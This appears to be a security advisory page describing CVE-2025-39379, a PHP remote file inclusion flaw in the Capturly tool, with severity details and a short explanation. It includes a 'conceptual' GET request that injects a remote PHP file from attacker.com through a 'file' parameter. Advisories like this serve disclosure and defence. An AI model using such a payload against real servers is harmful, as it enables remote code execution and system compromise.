Overview
The CVE-2025-39379 vulnerability pertains to an improper control of the filename for the Include/Require statement in PHP Program, specifically ‘PHP Remote File Inclusion’ in a tool called Capturly. This vulnerability is of significance because it can potentially lead to system compromise or data leakage, affecting users of Capturly from versions n/a through 2.0.1.
Vulnerability Summary
CVE ID: CVE-2025-39379
Severity: High (7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or potential data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
Capturly | n/a through 2.0.1
How the Exploit Works
The vulnerability stems from an improper control of filename for Include/Require statement in PHP Program, specifically PHP Remote File Inclusion. This allows an attacker to inject a file from a remote server, which is then included and executed by the vulnerable script on the server. This can lead to unauthorized access, data leakage, or even a system compromise.
Conceptual Example Code
Here is a conceptual example of how the vulnerability might be exploited:
GET /vulnerable.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: target.example.comIn this example, an attacker could potentially manipulate the ‘file’ parameter in the GET request to force the server to include and execute a malicious PHP file from a remote server.
This example is conceptual and provided for illustrative purposes only. Actual exploit code may vary based on the specific implementation of the vulnerable script.
